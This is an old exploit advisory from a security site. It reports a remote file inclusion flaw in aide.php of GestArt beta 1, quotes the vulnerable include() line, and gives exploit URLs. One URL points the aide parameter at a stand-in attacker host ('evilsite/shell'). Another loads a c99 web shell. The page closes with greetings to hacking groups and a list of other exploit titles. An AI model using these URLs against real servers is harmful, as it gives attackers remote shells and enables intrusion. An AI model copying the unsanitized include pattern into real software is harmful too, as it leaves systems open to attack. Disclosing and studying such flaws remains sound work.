exploits , vulnerabilities , articles , GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability

2007-03-13

GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability

Rated as : Moderate Risk

                                                         
.-""""""""-.                       
         
                                                         /   Dj7xpl   \   
                          
                                                        |              |  
                             
                                                        |,  .-.  .-.  ,|  
                             
                                                        | )(_o/  \o_)( |  
                                  
                                                        |/     /\     \|  
                              
                                              (@_       (_     ^^     _)  
               
                                         _     )
\_______\__|IIIIII|__/_______________________________
                                       
(_)@8@8{}<________|-\IIIIII/-|________________________________>
                                               )_/        \          / 
                                               (@
											   
+_______________________________________________Iranian Are The Best In
World___________________________________________+
#
#
#   Portal     :   GestArt 
#   Download   :  
http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion
#   Author     :   Dj7xpl  | Dj7xpl@yahoo.com
#   Risk       :   High (Remote File Inclusion Exploit)
#
+_______________________________________________________________________________________________________________________+


+-------------**************************************** aide.php
*********************************************-----------+
#
#
#    <? include("$aide.txt");?> </p>   
<<<< line (21)
#
#
+-------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+
#
#
#    Exploit  : 
http://[target]/[path]/aide.php?aide=http://evilsite/shell        
<<<<  Shell (Text File)
#    Example  : 
http://localhost/getart/aide.php?aide=http://localhost/c99        
<<<<  c99.txt
#
+_______________________________________________________________________________________________________________________+

+_______________________________________________________________________________________________________________________+
#
#
#    Sp Tnx      :  Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir,
Shabgard.org,Simorgh .............
#
#
+_______________________________________________________________________________________________________________________+


securitydot.net - 2007-03-13

Exploits - newest 10 RSS | More

2007-06-15 57098 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34088 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42243 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29255 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19687 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16638 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19340 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16519 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33519 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17164 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit